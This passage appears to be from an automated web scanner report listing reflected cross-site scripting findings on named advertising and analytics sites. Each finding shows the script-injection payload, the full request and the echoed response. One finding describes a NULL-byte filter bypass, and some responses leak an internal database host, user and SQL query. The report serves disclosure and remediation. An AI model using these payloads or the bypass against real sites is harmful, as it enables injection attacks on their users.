Request

GET /st?ad_type=ad&ad_size=728x90&section=1738535&f984d"-alert(1)-"cae446732d4=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?size=728x90&m=3&l=2792891&c=200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!$s!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<y]81!!tjQ!!!!$<xqZB!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:39:20 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 07 May 2011 22:39:20 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&f984d"-alert(1)-"cae446732d4=1&s=1738535&_salt=1043515613";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

5.22. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 40985<script>alert(1)</script>52a30286c50 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=40985<script>alert(1)</script>52a30286c50&source=js&ord=5429500 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSESE002=pctl=311033&fpt=0%2C311033%2C&pct%5Fdate=4133&FL311033=1&pctm=1&FM34983=1&pctc=34983&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sat, 07 May 2011 01:49:21 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c500=uid=101126131; expires=Sun, 08-May-2011 01:50:20 GMT; path=/
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c50=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4143&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 07-Jun-2011 01:50:20 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:20 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=40985<script>alert(1)</script>52a30286c50.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

5.23. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %0096ee3<script>alert(1)</script>d1ed8df0664 was submitted in the ac parameter. This input was echoed as 96ee3<script>alert(1)</script>d1ed8df0664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /appshandler.php?ac=1%0096ee3<script>alert(1)</script>d1ed8df0664&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 600

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 1.96ee3<script>alert(1)</script>d1ed8df0664 AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

5.24. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload f84ef<script>alert(1)</script>6416a2fdb7e was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appshandler.php?ac=2546f84ef<script>alert(1)</script>6416a2fdb7e&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: apps.sapha.com
Cookie: sapha_tst_2546=TRUE

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 682

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2546f84ef<script>alert(1)</script>6416a2fdb7e AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload e1fc4<script>alert(1)</script>5e2e2ed7ccb was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8e1fc4<script>alert(1)</script>5e2e2ed7ccb&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:14 GMT
Date: Sat, 07 May 2011 22:38:14 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8e1fc4<script>alert(1)</script>5e2e2ed7ccb", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.26. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload f7157<script>alert(1)</script>8ca44a1cf27 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334f7157<script>alert(1)</script>8ca44a1cf27&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:28 GMT
Date: Sat, 07 May 2011 22:38:28 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334f7157<script>alert(1)</script>8ca44a1cf27", c15:"", c16:"", r:""});



5.27. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 88164<script>alert(1)</script>91bf12a9f59 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15=88164<script>alert(1)</script>91bf12a9f59 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:31 GMT
Date: Sat, 07 May 2011 22:38:31 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"88164<script>alert(1)</script>91bf12a9f59", c16:"", r:""});



5.28. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e1990<script>alert(1)</script>34c577c3e19 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113e1990<script>alert(1)</script>34c577c3e19&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:16 GMT
Date: Sat, 07 May 2011 22:38:16 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113e1990<script>alert(1)</script>34c577c3e19", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.29. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload edfaf<script>alert(1)</script>b066ab31bd7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16edfaf<script>alert(1)</script>b066ab31bd7&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:19 GMT
Date: Sat, 07 May 2011 22:38:19 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16edfaf<script>alert(1)</script>b066ab31bd7", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.30. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 4a196<script>alert(1)</script>3f29ade7707 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=123174a196<script>alert(1)</script>3f29ade7707&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:20 GMT
Date: Sat, 07 May 2011 22:38:20 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


